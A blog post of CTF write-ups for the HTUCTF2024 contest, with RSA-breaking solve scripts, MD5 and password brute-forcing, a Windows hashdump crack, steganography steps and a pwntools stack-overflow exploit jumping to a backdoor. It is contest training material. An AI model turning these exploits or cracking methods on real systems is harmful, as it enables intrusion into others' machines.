window.onload=function(){ /*页面加载完成之后生成博客目录*/ BlogDirectory.createBlogDirectory("cnblogs_post_body","h2","h3",20); }

HTUCTF2024 河南师范大学招新赛

CRYPTO

easyMath

题目

中国古代有很多人同名
譬如同样叫孙子,有的人会兵法,有的人会数学
你能帮我求解出这道题的答案吗?
请开启容器后下载对应输出文件
难度:简单

from secret import flag
from Crypto.Util.number import *


def s2n(string):
	return int(string.encode("utf-8").hex(),16)


m = s2n(flag)

n1 = getPrime(256)
n2 = getPrime(256)

c1 = m % n1
c2 = m % n2

with open("./result.txt","w") as file:
	file.write(f"{c1=}\n{c2=}\n{n1=}\n{n2=}")
	file.close()


c1=83689382223866455921972283666041548913707590157650641569649861997774896018775
c2=59781417889496026093316789713307179877847969875945980953377618064246216393966
n1=94819471330207996193824867701549517420931391131653697367385442658040198169087
n2=81518723062141584749826931381471762289036698180799665826428079725669435831939

我的解答:

给了两组n,c,两两互素,中国剩余定理模板直接打

import gmpy2
import libnum
c1=83689382223866455921972283666041548913707590157650641569649861997774896018775
c2=59781417889496026093316789713307179877847969875945980953377618064246216393966
n1=94819471330207996193824867701549517420931391131653697367385442658040198169087
n2=81518723062141584749826931381471762289036698180799665826428079725669435831939
e = 1
n = [n1, n2]
c = [c1, c2]
N = 1
for i in n:
    N = N * i
m_e = 0
for i in range(len(n)):
    m_e = m_e + c[i] * N // n[i] * gmpy2.invert(N // n[i], n[i])
m_e = m_e % N
m, f = gmpy2.iroot(m_e, e)
flag = libnum.n2s(int(m))
print(flag)
# HTUCTF{6830dfb6-6dad-47c3-9845-cbf8729a39d0}

babyRSA

题目

只有做出了这道题,你才算真正迈入了密码学的世界
RSA的用途非常广泛,从SSH到网页交互,处处存在着RSA的身影
他是一种非对称加密方式,有两把钥匙,我们用一把钥匙进行加密,对方只能用另一把钥匙进行解密
我们管这两把钥匙叫做公钥和私钥
不知你有没有好奇过,这么神奇的算法究竟是怎么做到的?
在这道题中,我将给你公钥和私钥,你能够把加密的信息解出来吗?
题目难度:简单

from secret import flag
from Crypto.Util.number import *
from gmpy2 import *

def s2n(string):
	return int(string.encode("utf-8").hex(),16)


m = s2n(flag)

p = getPrime(1024)
q = getPrime(1024)
n = p*q
e=0x10001
phi = (p-1)*(q-1)
d=int(invert(e,phi))

c = pow(m,e,n)

with open("./babyRSA.txt","w") as file:
	file.write(f"PublicKey = {(n,e)}\nPrivateKey = {(n,d)}\nSecretMessage = {c}")
	file.close()
PublicKey = (15523080121481037533846720367813834377778668111438874384664871738673652023893681357714286669202218630173688764354403816749912450587255647744945603619550878566130134326797819954512983867052500839161599443844224323267337522399135478058113507907104399219913320985529466978833344052718261054083152011157455045097091641203323851668404438287902103403601573018986296413876255090488772617992957471058548453512371563625245567602182322624846936417836549954739151793975227074948775314087417591594723093093078900110015127568580332294339983560296269696651253323984277447954358921687931219529934624802414560546769410979640248733659, 65537)
PrivateKey = (15523080121481037533846720367813834377778668111438874384664871738673652023893681357714286669202218630173688764354403816749912450587255647744945603619550878566130134326797819954512983867052500839161599443844224323267337522399135478058113507907104399219913320985529466978833344052718261054083152011157455045097091641203323851668404438287902103403601573018986296413876255090488772617992957471058548453512371563625245567602182322624846936417836549954739151793975227074948775314087417591594723093093078900110015127568580332294339983560296269696651253323984277447954358921687931219529934624802414560546769410979640248733659, 10130966979812730784101987023698572165438594877129919513875915803386628078276096541375947471124972080653508946533508705769675989693121420958341293590115967743877780573199816212130999984155050824612355332287183770309757244122492983619964767386402633068863887043854103203055675295220493184082954328413364468756304963614016917597743916465686317910038955387483525262605921266852350229828235038160818884177156053818135328631651154292654654240777442377441948318512112581410714535003804163937871843629160969182930526468352966433926341943406916675978477553950863356810621030844225209745966135746365112354585567779963748595969)
SecretMessage = 8909815489319611747101806090352005136825996914855161761302645282643080552432976736620209215329466289301992429134065407495314041984721445376467363401021503220512909366842774353910947660541614402215323602839266991486292484969950842395065745792919439549479729664538304190570526236917426962327919265077666475322894816082657333664773384861021347407612617932770946226057878531069668485974874093332911603383506567742453209014787426744169318763457638545787910612700001393603668998957766517443362067847142093494532359202010509321223568196703549094729917579540223646141085303490009162322771331375674034776269587055027505487338

我的解答:

给了n,e,d,c直接打

from Crypto.Util.number import *
n=15523080121481037533846720367813834377778668111438874384664871738673652023893681357714286669202218630173688764354403816749912450587255647744945603619550878566130134326797819954512983867052500839161599443844224323267337522399135478058113507907104399219913320985529466978833344052718261054083152011157455045097091641203323851668404438287902103403601573018986296413876255090488772617992957471058548453512371563625245567602182322624846936417836549954739151793975227074948775314087417591594723093093078900110015127568580332294339983560296269696651253323984277447954358921687931219529934624802414560546769410979640248733659
e=65537
c=8909815489319611747101806090352005136825996914855161761302645282643080552432976736620209215329466289301992429134065407495314041984721445376467363401021503220512909366842774353910947660541614402215323602839266991486292484969950842395065745792919439549479729664538304190570526236917426962327919265077666475322894816082657333664773384861021347407612617932770946226057878531069668485974874093332911603383506567742453209014787426744169318763457638545787910612700001393603668998957766517443362067847142093494532359202010509321223568196703549094729917579540223646141085303490009162322771331375674034776269587055027505487338
d=10130966979812730784101987023698572165438594877129919513875915803386628078276096541375947471124972080653508946533508705769675989693121420958341293590115967743877780573199816212130999984155050824612355332287183770309757244122492983619964767386402633068863887043854103203055675295220493184082954328413364468756304963614016917597743916465686317910038955387483525262605921266852350229828235038160818884177156053818135328631651154292654654240777442377441948318512112581410714535003804163937871843629160969182930526468352966433926341943406916675978477553950863356810621030844225209745966135746365112354585567779963748595969

print(long_to_bytes(pow(c,d,n)))
# HTUCTF{ebc4a957-ab76-481c-b6bd-667cc4ac3753}

RSA

题目

干的漂亮!你现在一定掌握了一定的RSA相关知识了,你现在可能觉得RSA是如此的完美
是的,在理想情况下,2048位的RSA甚至可以用来为银行提供安全保障
但是万事皆有例外,在某些情况下,RSA也会变的不那么安全
那么,本题就模拟了这样一种不太安全的RSA,他允许你通过公钥去计算得到私钥
在本题中,你需要通过你高中所学的知识与素数相关知识去找到漏洞所在
并计算出私钥来解开关键数据!
题目难度:中等

from secret import flag
from Crypto.Util.number import *
from gmpy2 import *

def s2n(string):
	return int(string.encode("utf-8").hex(),16)


m = s2n(flag)

def gen():
	p = getPrime(1024)
	q = int(next_prime(p))
	n = p*q
	phi = (p-1)*(q-1)
	e=0x10001
	while(gcd(phi,e) != 1):
		p = getPrime(1024)
		q = next_prime(p)
		n = p*q
		phi = (p-1)*(q-1)
	return (n,e,phi)


n,e,phi = gen()
c = pow(m,e,n)

with open("./RSA.txt","w") as file:
	file.write(f"{n=}\n{c=}")
	file.close()

n=21286146193854256777821383042439507781105332290319538512628531084363651251523737327523526945612481957021838676502097885784407117228821536316627194056016486984426091341625957366569549571084440241355428867857837140319691847950217286102843758914496900637376261209537885852057822619662489521115321859242996996458728300402824811649138687472097270381948645979317238405355317018553106347027764063263805658928486133580606644257911929016951909686457495514815344574782826352986788656399212873924655579987522938396847374837850343107582172369858866834252004753149808298622166784424349528065903222286329891172505299710375017996191
c=7921489143329983775649495695329191444017407997719201400647964433213317629336909589895994155506980858710603819714367102048723400232379433082760979014532262440915742640192044614047545849862082848156805064088229776304993545321080324512923192149436096920526568355327960180036643391499502690341050835062928627571479179709775940839058598193047520944765623044970104274162972438155291820907007955749419361799197271532772738133005238318979095274472556402534604449320547273946695463016399927750930765171319755043575142378579721541211811566320576805327333527544884573840360315620734184329550640235605842721184595864846192049833

我的解答:

临近素数,板子打

from Crypto.Util.number import *
from gmpy2 import *
e = 65537
n=21286146193854256777821383042439507781105332290319538512628531084363651251523737327523526945612481957021838676502097885784407117228821536316627194056016486984426091341625957366569549571084440241355428867857837140319691847950217286102843758914496900637376261209537885852057822619662489521115321859242996996458728300402824811649138687472097270381948645979317238405355317018553106347027764063263805658928486133580606644257911929016951909686457495514815344574782826352986788656399212873924655579987522938396847374837850343107582172369858866834252004753149808298622166784424349528065903222286329891172505299710375017996191
c=7921489143329983775649495695329191444017407997719201400647964433213317629336909589895994155506980858710603819714367102048723400232379433082760979014532262440915742640192044614047545849862082848156805064088229776304993545321080324512923192149436096920526568355327960180036643391499502690341050835062928627571479179709775940839058598193047520944765623044970104274162972438155291820907007955749419361799197271532772738133005238318979095274472556402534604449320547273946695463016399927750930765171319755043575142378579721541211811566320576805327333527544884573840360315620734184329550640235605842721184595864846192049833

sn = gmpy2.isqrt(n)
q = gmpy2.next_prime(sn)
p = n // q
phi = (p-1)*(q-1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))
# HTUCTF{0bc91ba1-7847-424f-a5ae-7514c2dae479}

密码_签到

题目

你知道凯撒加密吗?

FRSARD{UCJAMKC_RM_2024_FRSARD!!!}

我的解答:

随波逐流梭

HTUCTF{WELCOME_TO_2024_HTUCTF!!!}

high_RSA

题目

恭喜你,你已经了解了RSA在可能得情况下的危害
但是,正如麻绳专挑细处断一样,安全的方方面面都不可或缺
让我们假设你是一名红客,手里拥有一个对方电脑的后门程序,但是这个程序为了不被发现无法申请足够内存
为了获取对方的数据,你利用这个程序获得了对方电脑RSA的数据,以便通过SSH连接到对方电脑
这个数据量过于庞大,以至于你只能获取到一部分数据
你能够恢复出来完整的数据来成功骇入吗?
题目难度:难
(其实也没多难...不要被抽象代数吓到了,我不会数学≠我不会解题,不等式秒了)

from secret import flag
from Crypto.Util.number import *
from gmpy2 import *

def s2n(string):
	return int(string.encode("utf-8").hex(),16)


m = s2n(flag)

def gen():
	p = getStrongPrime(1024)
	q = getStrongPrime(1024)
	n = p*q
	phi = (p-1)*(q-1)
	e=0x10001
	while(gcd(phi,e) != 1):
		p = getStrongPrime(1024)
		q = getStrongPrime(1024)
		n = p*q
		phi = (p-1)*(q-1)
	return (n,e,phi,p,q)


n,e,phi,p,q = gen()
c = pow(m,e,n)
high_p = (p >> 256) << 256

with open("./highRSA.txt","w") as file:
	file.write(f"{n=}\n{c=}\n{high_p=}")
	file.close()
n=26832066962458662767711134650569516764878390244093044249431717541352809829010026292756085075249493683546901865571162092807642447066717935954820980203362970326424457510243979090947839410021515024546564848003707416178430454370843256632438176839918149251551762655339805650499916986912193271524738666644992154557709230313336222352760741284949409799415476076495429070382400856900167330412449787134931316411702443532096911949687029419857447352146932683073974227601854627297878898195567899861786632327700242864905513181808927779278798543351526860932005535628493103381412084360219740343872835463714854550964908803100739720711
c=5263373082734577567839479586655414623605123502659516848748731798811781440341949806983283726466045084344593071073334658221121562912558383981187865516410285252387584393467585522751249550213224687813899297082806077871733395201872158325739707521228687723161973373291027234390564962358683344756569018948507404252733763898300987607979776946680568688214863909198222484739353033110947869228017720295399019491952331445167542451969127203340175478249933145970770930874714514592875202353852229150430254860073007705757537682021345088127046213891504810736043999063285587400229349628962118127506856508919505894615638568778221088766
high_p=155260268569003012839830552245401347442679649702540687666718397914567736179525136763425429591738078795659488517073327110371579992023376288690407974823049327122522731236534457700781670557633182106779419333443659720534567359356182612444617411150434138985917242359563702694312595606207476750599129603389758898176

我的解答:

经典的p高位泄露

import gmpy2
from Crypto.Util.number import *
e=65537
n=26832066962458662767711134650569516764878390244093044249431717541352809829010026292756085075249493683546901865571162092807642447066717935954820980203362970326424457510243979090947839410021515024546564848003707416178430454370843256632438176839918149251551762655339805650499916986912193271524738666644992154557709230313336222352760741284949409799415476076495429070382400856900167330412449787134931316411702443532096911949687029419857447352146932683073974227601854627297878898195567899861786632327700242864905513181808927779278798543351526860932005535628493103381412084360219740343872835463714854550964908803100739720711
c=5263373082734577567839479586655414623605123502659516848748731798811781440341949806983283726466045084344593071073334658221121562912558383981187865516410285252387584393467585522751249550213224687813899297082806077871733395201872158325739707521228687723161973373291027234390564962358683344756569018948507404252733763898300987607979776946680568688214863909198222484739353033110947869228017720295399019491952331445167542451969127203340175478249933145970770930874714514592875202353852229150430254860073007705757537682021345088127046213891504810736043999063285587400229349628962118127506856508919505894615638568778221088766
high_p=155260268569003012839830552245401347442679649702540687666718397914567736179525136763425429591738078795659488517073327110371579992023376288690407974823049327122522731236534457700781670557633182106779419333443659720534567359356182612444617411150434138985917242359563702694312595606207476750599129603389758898176
R.<x> = PolynomialRing(Zmod(n))
f = high_p + x
x = f.small_roots(X = 2^256,beta = 0.4)
if x:
    p = high_p + int(x[0])
    q = n // p
    d = gmpy2.invert(e,(p-1)*(q-1))
    m = pow(c,d,n)
    print(long_to_bytes(int(m)))
# HTUCTF{bbb7e2c4-5739-4eab-ad45-570c86be20e7}

Attack

题目

对于一种密码体系,如果我们能够找到一种方法,使得通过已知的部分内容和对应的被加密的内容,来破解出对应的秘钥
那么这种方法就被叫做明文攻击
那么在本题中,将会给你一种被类似于凯撒密码的密码体系加密后的值
你能够对他进行攻击并找出flag吗?
题目难度:简单

本题flag头为htuctf{}

secret is :oxfnhm{51fn0n78-78r2-49k2-e6o6-45386qth8i2q}

我的解答:

维吉尼亚解码,key是hello(根据flag头算出来的)

奇怪的RSA

题目

这个n怎么跟之前学的不一样了
难度:中等偏下

n=9797280722297383274206129366924911238159531646782588235425496441018603521906214822246463461173026436766357301667490255758014545136376215630632913217943693454599607181104457459704890073820815269629927086893622983109900322077682061770037009627858293858079170648986304796239176995439230791482842207808760812707274441718245663482728958202732073615184138431872947691082675226097330289348107538915563758447312783574426116626142170193857288512932028427662766889672667666124977746543158461842707085268112769440167135292097914024183004899521423565999413912896081894668524836680741305072184620592976414632021146993068852321682224774063402386979275754410550658725965565558741379647004611814084223568478000636303177114721095055926493733229126101656421088488149818472808276183648127582974030582322605326949335921761883338261371947420333298835965419945468897218378857695789805996307849895056019137558524547291427992927750239912783691973289027652868009039409101567361743084903654992780865430272335247215413205988182536939011777593246190904789384746466169417549523741915876204210448126866806898004736948795818397941220900188611543001463316268786023800879826714282193478815064580026612881606703097040735229393269388992971022987866655043694603025183226901723140756053762333659842691711475526354396212072576764822816149219166129647066887324015483710351976091899190818277553825384103028795714466631003515086950798032880614154340697278735600240355126104124454472587233763326168718337010496877414696789855658240440976001073107676481646007868257165514512406462907
c=5026294270472341516281967768024823988211520479705550347791737269197144991018432260772869917413931970596323376462942676330952706594203686062230870565305755713397064980008245765280923086185322432350745365676393859410733791638737980029398313605454331200823466184561513332154358260911960012186030476084183825686415220565409492864776416837513373738512522098564292785408992952241100323270440158180673533227197308932835014106694454970006386898536636626965401897549172858412952232900506615210718784844859331905728127508619293848356738221599940095985149564780003406814853991525248042768596039920545745290215481665663646075842598915149383754511745185069733195598186369553443089170842916619037179927876137170091853123369124452414031777068336531175674802393050859481751905561595637672065609328749148665586779113822274605772746671318603508401332234892783270849494429661389179557105978067614723323979133624001944328078576201959628636669711294925830023172880802286460253693491031523534646275507929337557144216000320046044856456105803221553459208055536477727124999642450266747885923500686074656279403605048320346579292324096695911518310045059703013950287439053123110957256092192591738831212887488314280535596199050937975272001815140057838227666534017906857787101647310250002243565024224470944832652926327140423057025650796529363452647655178633472248390631519187741674904685731259241960485176749338780224419187384859336116383909982282465893681707228873285368252148860007084379792234483840610940427165345252500655046498669531835852991292614317980670782795421
e=65537

我的解答:

分解n发现是p的五次方,这种情况下的phi=p**5 - p**4

exp:

import gmpy2
from Crypto.Util.number import *

n=9797280722297383274206129366924911238159531646782588235425496441018603521906214822246463461173026436766357301667490255758014545136376215630632913217943693454599607181104457459704890073820815269629927086893622983109900322077682061770037009627858293858079170648986304796239176995439230791482842207808760812707274441718245663482728958202732073615184138431872947691082675226097330289348107538915563758447312783574426116626142170193857288512932028427662766889672667666124977746543158461842707085268112769440167135292097914024183004899521423565999413912896081894668524836680741305072184620592976414632021146993068852321682224774063402386979275754410550658725965565558741379647004611814084223568478000636303177114721095055926493733229126101656421088488149818472808276183648127582974030582322605326949335921761883338261371947420333298835965419945468897218378857695789805996307849895056019137558524547291427992927750239912783691973289027652868009039409101567361743084903654992780865430272335247215413205988182536939011777593246190904789384746466169417549523741915876204210448126866806898004736948795818397941220900188611543001463316268786023800879826714282193478815064580026612881606703097040735229393269388992971022987866655043694603025183226901723140756053762333659842691711475526354396212072576764822816149219166129647066887324015483710351976091899190818277553825384103028795714466631003515086950798032880614154340697278735600240355126104124454472587233763326168718337010496877414696789855658240440976001073107676481646007868257165514512406462907
c=5026294270472341516281967768024823988211520479705550347791737269197144991018432260772869917413931970596323376462942676330952706594203686062230870565305755713397064980008245765280923086185322432350745365676393859410733791638737980029398313605454331200823466184561513332154358260911960012186030476084183825686415220565409492864776416837513373738512522098564292785408992952241100323270440158180673533227197308932835014106694454970006386898536636626965401897549172858412952232900506615210718784844859331905728127508619293848356738221599940095985149564780003406814853991525248042768596039920545745290215481665663646075842598915149383754511745185069733195598186369553443089170842916619037179927876137170091853123369124452414031777068336531175674802393050859481751905561595637672065609328749148665586779113822274605772746671318603508401332234892783270849494429661389179557105978067614723323979133624001944328078576201959628636669711294925830023172880802286460253693491031523534646275507929337557144216000320046044856456105803221553459208055536477727124999642450266747885923500686074656279403605048320346579292324096695911518310045059703013950287439053123110957256092192591738831212887488314280535596199050937975272001815140057838227666534017906857787101647310250002243565024224470944832652926327140423057025650796529363452647655178633472248390631519187741674904685731259241960485176749338780224419187384859336116383909982282465893681707228873285368252148860007084379792234483840610940427165345252500655046498669531835852991292614317980670782795421
e=65537
p = gmpy2.iroot(n,5)[0]
d = gmpy2.invert(e, p**5-p**4)
m = pow(c, d, n)
print(long_to_bytes(m))
# HTUCTF{7b2ca463-d2d9-47ac-930b-6914c3d00c8a}

baby_equation

题目

描述:简单的方程组
题目难度:中等

from secret import flag
from Crypto.Util.number import *
from gmpy2 import *

filename = "baby_equation.txt"

def s2n(string):
	return int(string.encode("utf-8").hex(),16)


m = s2n(flag)

e = 65537
p = getPrime(256)
q = getPrime(158)
r = getPrime(126)
n = p*q*r
hint1 = p**2-q**3+r**5
hint2 = p-q**2-r**3
c = pow(m,e,n)
print(f'n = {n}')
print(f'c = {c}')
print(f'hint1 = {hint1}')
print(f'hint2 = {hint2}')

with open(f"./{filename}","w") as file:
	file.write(f"{n=}\n{c=}\n{hint1=}\n{hint2=}")
	file.close()

我的解答:

方程组,三个未知数,三个等式

直接解

import gmpy2
import sympy as sp
from Crypto.Util.number import long_to_bytes

# 定义符号变量p,q
p, q, r = sp.symbols('p q r')

# 定义方程组
n=1714808108641798425751310477167823335955229712489728804761312762037242675123506918099136836072952998053478120207249337855548456594600603091879518033495336649464097
c=1271059887748896825060264613725111099333346917676850000927141530723445751426003464525479424933165773851501797216393819428216922457947718026431628278372802650997905
hint1=873322371665117750002905530165951105343454768307957282438202226511477054275833928519265678069449383868985966127316349093439543595940439424293980757113264748232611064850437734072475831795015
hint2=-231581973880579877071715841045171446682851086334176281592273453765336628759594866687658829710062474739604131003041
eq1 = p**2-q**3+r**5-hint1
eq2 = p-q**2-r**3-hint2
eq3 = p*q*r-n
# 求解方程组
sol = sp.solve((eq1, eq2, eq3), (p, q, r))
print(sol)
# p = 92915895594985626121143662996242137124019722863293916576352995643967780302439
# q = 300531911762485106017266076248013109964445189793
# r = 61409408903806830899572429924195985111

# 解题
n=1714808108641798425751310477167823335955229712489728804761312762037242675123506918099136836072952998053478120207249337855548456594600603091879518033495336649464097
c=1271059887748896825060264613725111099333346917676850000927141530723445751426003464525479424933165773851501797216393819428216922457947718026431628278372802650997905
e = 65537
p = 92915895594985626121143662996242137124019722863293916576352995643967780302439
q = 300531911762485106017266076248013109964445189793
r = 61409408903806830899572429924195985111
d = gmpy2.invert(e, (p - 1) * (q - 1) * (r - 1))
m = pow(c, d, n)
print(long_to_bytes(m))
# HTUCTF{a29fa9c1-ac6b-4381-b173-002549e01c06}

guoql的大冒险

题目

guoql喜欢小兔子,有一天他家养的小兔子被坏人用3层栅栏困住了,聪明的你能帮助guoql解决困难把兔兔释放出来吗?

UdX6OtWqCp0KRHsA
z2sGk1DifJ3aqdNZzk4j7Sk73dTpwTI1BkfFV/KaLWB5bTcODXvH

我的解答:

先栅栏解码再兔子流解码

 

MISC

彩蛋

题目

在这个比赛平台中有一些菜单,你能找到他并恢复出来flag吗?

不需要对网站进行爆破扫描!

我的解答:

观察平台会发现如下信息:

我想你需要知道:4854554354467b77656c63306d655f325f485455

141,156,144,137,150,141,166,145,137,146,165,156,175

还有一张图片(试过就知道这张图其实没有用)

第一部分:16进制转字符: HTUCTF{welc0me_2_HTU

第二部分:八进制转字符: and_have_fun}

拼接:HTUCTF{welc0me_2_HTUand_have_fun}

初中数学(计算机版)

题目

弄脏的数字
就如同小明小时候喜欢将墨水泼到纸张上一样,学了计算机的小明还是没有改掉这个坏习惯
这下,他又通过奇怪的方式“一不小心”把部分数字给弄脏了(题目中用?表示)
还好老师保存了md5值
你能帮他恢复数据吗?
题目难度:简单

这是他弄脏的flag
HTUCTF{372?7539-0217-1?ef-a234-f8?9d27fc?22}

md5=b9636e79bccbe1cbcdb2f9a7f698742d

我的解答:

典型的MD5爆破

import string
import hashlib
dic1=string.digits+string.ascii_lowercase+string.ascii_uppercase
for i1 in dic1:
	for i2 in dic1:
		for i3 in dic1:
			for i4 in dic1:
				t='HTUCTF{372'+i1+'7539-0217-1'+i2+'ef-a234-f8'+i3+'9d27fc'+i4+'22}'
				md5 = hashlib.md5(t.encode('utf-8')).hexdigest()
				#print t
				if md5[:38] == 'b9636e79bccbe1cbcdb2f9a7f698742d':
					print (t)
# HTUCTF{37277539-0217-11ef-a234-f889d27fcc22}

ez取证

题目

小m在他的电脑里面存放了一个机密文件,你能找到这个文件吗?
https://www.123pan.com/s/VXmfjv-bPv4H.html
提取码:A5T4
题目难度:中等

我的解答:

R-Studio扫描镜像文件发现压缩包:flag.txt.zip

还原出来即可。解压发现需要密码。

volatility进行hashdump爆破即可

得到哈希值 15f952a687d575198c3c5dbd9a1aa89c 后 somd5解码即可得到密码:Windows.7

htuCTF{Th1s_1s_e2sy_f0rens1cs!!!}

a1eiqinuo

题目

检验原批浓度的时候到了!
ps:得到的flag请套上htuCTF{}提交

我的解答:

解压得到图片

010文件尾发现 c3RlZ2hpZGVfcGFzcz1odHVDVEY=

base64解码:steghide_pass=htuCTF

可知steghide隐写,尝试原图无果。发现里面藏得压缩包里面还有图片。。。。

卡里分离得到压缩包,纯数字八位爆破得到密码 20240424

这个应该才是steghide隐写,然后可以得到wenzi.jpg

一眼丁真 原神字体,对着下面的表找即可。。

htuCTF{yuanshenqidong}

music

题目

好听的音乐中暗藏玄机。
得到的flag请修改为HTUCTF{}
题目难度:简单

尝试查看属性,里面可能有提示

我的解答:

属性里面发现MP3Stego 还有一个发布者:111

指令:decode -X -P 111 music.mp3

直接得到:flag{valorant_is_a_good_game}

提交时改下flag头即可

baseHome-misc签到

题目

base家族的加密你知道几个?
难度:签到

SkJLRktRMlVJWjVXRVlMVE1VM0RJWDNCTlpTRjZZVEJPTlNUR01TN05GWlY2NVRGT0o0VjYyREJPQllIUzdJPQ==

我的解答:

echo

题目

感觉不如初音未来

我的解答:

echo.mid音频文件,找个在线工具打开即可 https://app.ampedstudio.com/

然后注册一个账号就能用了。

然后导入MIDI文件,如下:发现最下层的轨道给了hint,仔细观察像是电位高低,高位1,低位0,转一下01即可。

0110100001110100011101010110001101110100011001100111101101100111011101010110110100110001010111110011000101110011010111110011011001101111001101000010000101111101

解码得到:htuctf{gum1_1s_6o4!}

简单流量分析

题目

小明上传了一张图片,这是他产生的流量发生的变化。
题目难度:简单

我的解答:

根据题目描述,Wireshark流量分析HTTP流发现两个图片,分别是jpg和gif(直接搜索GIF89a

里面还有个hacker.png但没什么用。还是要从jpg和gif入手的。

导出HTTP全部文件即可。找最大的那个php文件,然后赛博厨子打开文件。

我们把GIF89a前面那段jpg信息删掉就行,然后保存文件为gif即可。分离每一帧。

发现有些地方有&#xx;类的编码。提取全部:&#102;&#108;&#97;&#103;&#123;&#83;&#48;&#50;&#50;&#121;&#52;&#111;&#114;&#114;&#53;&#125;

HTML解码得到:flag{S022y4orr5}

机位查询

题目

小l和小s去年去了很多地方,拍了很多照片,你能找到这几张图片是在哪里拍的吗?
ps:这三张图片的拍摄位置都是标志性地点,在地图上均可查。flag为1,2,3张图片拍摄点的每个字的第一个字母大写,三个拍摄点之间用_隔开
如:若找到的拍摄地点分别为"洛邑古城""二七广场""数字大厦",则flag为htuCTF{LYGC_EQGC_SZDS}
题目难度:简单

我的解答:

三幅图:

第一处:

百度地图找龙门石窟。定位到河对面,然后观察此图有楼梯有佛像。按方位来看是偏左一点。可发现是(礼佛台)百度一下这个地方简介会出现全名:礼佛观景台。此处也是拍照的好方位。

第二处:

百度识图发现是泰山。问了熟悉泰山的本地朋友知道是十八盘(很出名)。然后对着百度十八盘复现了一下地点 确信!

第三处:

后面是标志性建筑郑州玉米楼,谷歌查一下就行了,找下方位。不过我还问了郑州的朋友确认了一下(比较熟悉附近的,丹尼斯那一片区域)直接就看出来是烟草大厦了。

htuCTF{LFGJT_SBP_YCDS}

你好

题目

他说本来想给你点提示的,但是奈何嘤语不好
于是好心的guoql帮忙翻译成中文了!(掐腰.jpg)
你能知道他想提示你什么,并获取flag吗?
题目难度:简单

我的解答:

png宽高一把梭发现密码:maoxian

卡里分离图片得到压缩包,解压压缩包即可。

HTUCTF{you_can_encrypt_anything_in_anywhere}

PWN

ez_nc_签到

题目

听说nc指令很神奇?
题目难度:签到

我的解答:

nc连接靶机跟着步骤走就行。签到题没难度。

环境?环境!

题目

万事开头难 不如我们先配置一下Pwn环境吧!
题目难度:简单

我的解答:

根据txt所说走就行,前提是自己配好环境,然后运行脚本即可获得flag

完形填空

题目

什么?Pwn也可以完形填空?我竟然不用自己写脚本!可是这个栈溢出怎么写呢?溢出值是多少啊啊啊!!!
题目难度:中等

我的解答:

rbp是20转16进制也就是前面的buf[32]

简单跑一下后ls没效果。看到程序是64位少了8个字节补充回去即可,也就是padding=32+8=40

from pwn import *

context(log_level='debug',arch='amd64',os='linux')   
ip =''    # 输入题目给的ip
port=     # 输入题题目给的端口
p = remote(ip,port)
backdoor=0x401225
padding=40
payload=padding*b'a'+p64(0x401016)+p64(backdoor)
p.sendafter("please input:",payload)
p.interactive()

跑成功后ls看到flag 再cat flag即可。

RE

猜数字_签到

题目

厌倦了那些难题?那就加点运气成分,来猜一个0-127内的数字吧,猜对了我就会告诉你flag!你可以使用二分法来尝试,不过每轮我只会给你5次机会,所以你最后一次猜中的概率是多少呢?靠运气 or 实力,决定权在你。
题目难度:随机(取决于想怎么做)
题目考点:逆向或者运气

我的解答:

最简单的逆向没有之一。

二分法多试几下就出了。

ez_xor

题目

异或是一种计算机运算操作,具体来说,异或表示了相同为0,不同为1的数学运算
我们用^表示异或,英语中异或为xor
我将给你一个程序,请你利用群中所上传的IDA逆向工具试图进行逆向
并找到flag
题目难度:简单

我的解答:

exp:

def reverse_engineer_flag():
    # 初始化相关数据
    s = "tryw1th"
    v8 = [28, 6, 12, 20, 69, 18, 19]
    v11 = "s1mplex0r"
    v9 = [11, 1, 31, 47, 9, 81, 11, 73, 15]

    # 计算flag
    flag = ""
    for i in range(len(s)):
        flag += chr(v8[i] ^ ord(s[i]))

    for j in range(len(v11)):
        flag += chr(v9[j] ^ ord(v11[j]))

    return flag


if __name__ == "__main__":
    print(f"Flag: {reverse_engineer_flag()}")
# Flag: htuctf{x0r_e4sy}

倒车工程

题目

你最近了解到一家汽车公司,他们正在开发一种全新的自动驾驶系统。你对其中的“倒车工程”(Reverse Engineering)模块十分感兴趣,可是在使用时需要输入密码,这可怎么办呢?公司的员工告诉你:逆向嘛很简单,把屏幕倒过来就行(你内心吐槽:呃布什戈门,屏幕倒过来是什么鬼......
题目难度:简单

# -*- coding: utf-8 -*-
"""
倒车技术,我们是专业的! --2024.4.25 EMT倒车公司开发
"""

import time

# 倒车安全性校验
def compare_password(input_password):
    numbers = [0x48,0x54,0x55,0x43,0x54,0x46,0x7b,0x57,0x65,0x31,0x63,0x30,0x6d,0x65,0x5f,0x74,0x30,0x5f,0x72,0x33,0x76,0x65,0x72,0x73,0x65,0x5f,0x65,0x6e,0x67,0x31,0x6e,0x65,0x65,0x72,0x31,0x6e,0x67,0x7d]

    hex_password = [ord(char) for char in input_password]

    if hex_password == numbers:
        return True
    else:
        return False

# 倒车主系统
def main():
    password = input("请输入倒车密码:")
    if compare_password(password):
        print("密码正确!欢迎使用倒车系统。")
        print("自动倒车中......")
        time.sleep(5)
        print("倒车完成!请不要忘记你的密码:{},欢迎下次使用".format(password))
    else:
        print("密码错误!请重试。")

if __name__ == "__main__":
    main()

我的解答:

exp:

numbers = [0x48, 0x54, 0x55, 0x43, 0x54, 0x46, 0x7b, 0x57, 0x65, 0x31, 0x63, 0x30, 0x6d, 0x65, 0x5f, 0x74, 0x30, 0x5f, 0x72, 0x33, 0x76, 0x65, 0x72, 0x73, 0x65, 0x5f, 0x65, 0x6e, 0x67, 0x31, 0x6e, 0x65, 0x65, 0x72, 0x31, 0x6e, 0x67, 0x7d]

flag = ''.join(chr(num) for num in numbers)

print(flag)
# HTUCTF{We1c0me_t0_r3verse_eng1neer1ng}

firmware_decryption

题目

你的路由器坏掉了,你提取了路由器原有的固件(old_firmware.bin),并拿了一份新的固件(new_firmware.bin)。
但你在升级的时候发现新的固件是加密的,于是你心想:加密与解密!(解密后的新固件中包含有flag)
题目难度:难

我的解答:

1.给了一个加密的新固件包和一个未加密的固件包,大概率是中间版本这个旧固件应该是有解密新固件的程序

2.HxD打开看看旧固件发现一个真签名后面有用

3.binwalk解包旧固件后 grep -r download查找关键的词汇在StartFirmwareDownload.php文件中发现download

4.分析这边是一个关键代码,首先获取/etc/config/image_sign的签名,读取到$image_sign变量中,执行encimg -d -i  $fw_path是要解密的固件, -s 后是签名

5.去找到一下那个签名文件发现签名被修改了

